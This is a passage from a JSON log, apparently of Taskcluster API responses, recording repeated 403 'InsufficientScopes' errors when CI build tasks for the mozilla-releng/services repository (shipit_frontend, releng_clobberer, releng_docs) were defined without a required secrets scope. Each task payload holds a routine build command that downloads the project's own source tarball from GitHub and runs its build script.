\"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/mozilla-releng/services.git\",\n                            \"GITHUB_HEAD_USER\": \"garbas\",\n                            \"GITHUB_HEAD_SHA\": \"c70e3321a3d31f95036588c14dfafc3a0ea581f3\",\n                            \"GITHUB_HEAD_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"rok@garbas.si\"\n                        },\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\"\n                        ]\n                    },\n                    \"created\": \"2016-09-23T11:58:10.071Z\",\n                    \"deadline\": \"2016-09-24T11:58:10.071Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"DVuyshYdRHOYQ83mq8-uZQ\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"routes\": [],\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"tags\": {},\n                    \"expires\": \"2017-09-24T11:58:10.071Z\"\n                },\n                \"time\": \"2016-09-23T11:58:10.250Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-releng/services:branch:master\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"BkPi9EhsQpmkl5S9G63Txw\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"shipit_frontend\\\",\\n    \\\"description\\\": \\\"Test, build and deploy shipit_frontend\\\",\\n    \\\"owner\\\": \\\"rok@garbas.si\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/shipit_frontend\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"shipit_frontend\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"17a42239c28547f5645a774e3d70fa5c58811783\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"garbas\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"rok@garbas.si\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T11:58:10.072Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T11:58:10.072Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"DVuyshYdRHOYQ83mq8-uZQ\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T11:58:10.072Z\\\"\\n}\\n  time:     2016-09-23T11:58:10.261Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"BkPi9EhsQpmkl5S9G63Txw\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"shipit_frontend\\\",\\n    \\\"description\\\": \\\"Test, build and deploy shipit_frontend\\\",\\n    \\\"owner\\\": \\\"rok@garbas.si\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/shipit_frontend\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"shipit_frontend\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"17a42239c28547f5645a774e3d70fa5c58811783\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"garbas\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"rok@garbas.si\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T11:58:10.072Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T11:58:10.072Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"DVuyshYdRHOYQ83mq8-uZQ\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T11:58:10.072Z\\\"\\n}\\n  time:     2016-09-23T11:58:10.261Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"BkPi9EhsQpmkl5S9G63Txw\"\n                },\n                \"payload\": {\n                    \"metadata\": {\n                        \"name\": \"shipit_frontend\",\n                        \"description\": \"Test, build and deploy shipit_frontend\",\n                        \"owner\": \"rok@garbas.si\",\n                        \"source\": \"https://github.com/mozilla-releng/services/tree/master/src/shipit_frontend\"\n                    },\n                    \"scopes\": [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ],\n                            \"branches\": [\n                                \"master\"\n                            ]\n                        }\n                    },\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"payload\": {\n                        \"maxRunTime\": 7200,\n                        \"image\": \"nixos/nix:latest\",\n                        \"features\": {\n                            \"taskclusterProxy\": true\n                        },\n                        \"env\": {\n                            \"APP\": \"shipit_frontend\",\n                            \"TASKCLUSTER_SECRETS\": \"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\",\n                            \"GITHUB_EVENT\": \"push\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_BASE_SHA\": \"17a42239c28547f5645a774e3d70fa5c58811783\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/mozilla-releng/services.git\",\n                            \"GITHUB_HEAD_USER\": \"garbas\",\n                            \"GITHUB_HEAD_SHA\": \"c70e3321a3d31f95036588c14dfafc3a0ea581f3\",\n                            \"GITHUB_HEAD_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"rok@garbas.si\"\n                        },\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\"\n                        ]\n                    },\n                    \"created\": \"2016-09-23T11:58:10.072Z\",\n                    \"deadline\": \"2016-09-24T11:58:10.072Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"DVuyshYdRHOYQ83mq8-uZQ\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"routes\": [],\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"tags\": {},\n                    \"expires\": \"2017-09-24T11:58:10.072Z\"\n                },\n                \"time\": \"2016-09-23T11:58:10.261Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-releng/services:branch:master\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"Z-HYnzj4R6OqUHIXohRY1Q\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_clobberer\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_clobberer\\\",\\n    \\\"owner\\\": \\\"rok@garbas.si\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_clobberer\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_clobberer\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"17a42239c28547f5645a774e3d70fa5c58811783\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"garbas\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"rok@garbas.si\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T11:58:10.068Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T11:58:10.068Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"DVuyshYdRHOYQ83mq8-uZQ\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T11:58:10.068Z\\\"\\n}\\n  time:     2016-09-23T11:58:10.267Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"Z-HYnzj4R6OqUHIXohRY1Q\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_clobberer\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_clobberer\\\",\\n    \\\"owner\\\": \\\"rok@garbas.si\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_clobberer\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_clobberer\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"17a42239c28547f5645a774e3d70fa5c58811783\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"garbas\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"rok@garbas.si\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T11:58:10.068Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T11:58:10.068Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"DVuyshYdRHOYQ83mq8-uZQ\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T11:58:10.068Z\\\"\\n}\\n  time:     2016-09-23T11:58:10.267Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"Z-HYnzj4R6OqUHIXohRY1Q\"\n                },\n                \"payload\": {\n                    \"metadata\": {\n                        \"name\": \"releng_clobberer\",\n                        \"description\": \"Test, build and deploy releng_clobberer\",\n                        \"owner\": \"rok@garbas.si\",\n                        \"source\": \"https://github.com/mozilla-releng/services/tree/master/src/releng_clobberer\"\n                    },\n                    \"scopes\": [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ],\n                            \"branches\": [\n                                \"master\"\n                            ]\n                        }\n                    },\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"payload\": {\n                        \"maxRunTime\": 7200,\n                        \"image\": \"nixos/nix:latest\",\n                        \"features\": {\n                            \"taskclusterProxy\": true\n                        },\n                        \"env\": {\n                            \"APP\": \"releng_clobberer\",\n                            \"TASKCLUSTER_SECRETS\": \"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\",\n                            \"GITHUB_EVENT\": \"push\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_BASE_SHA\": \"17a42239c28547f5645a774e3d70fa5c58811783\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/mozilla-releng/services.git\",\n                            \"GITHUB_HEAD_USER\": \"garbas\",\n                            \"GITHUB_HEAD_SHA\": \"c70e3321a3d31f95036588c14dfafc3a0ea581f3\",\n                            \"GITHUB_HEAD_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"rok@garbas.si\"\n                        },\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\"\n                        ]\n                    },\n                    \"created\": \"2016-09-23T11:58:10.068Z\",\n                    \"deadline\": \"2016-09-24T11:58:10.068Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"DVuyshYdRHOYQ83mq8-uZQ\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"routes\": [],\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"tags\": {},\n                    \"expires\": \"2017-09-24T11:58:10.068Z\"\n                },\n                \"time\": \"2016-09-23T11:58:10.267Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-releng/services:branch:master\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"Pch2ix3rTXGCzfGQm37UTw\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_docs\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_docs\\\",\\n    \\\"owner\\\": \\\"rok@garbas.si\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_docs\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_docs\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"17a42239c28547f5645a774e3d70fa5c58811783\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"garbas\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      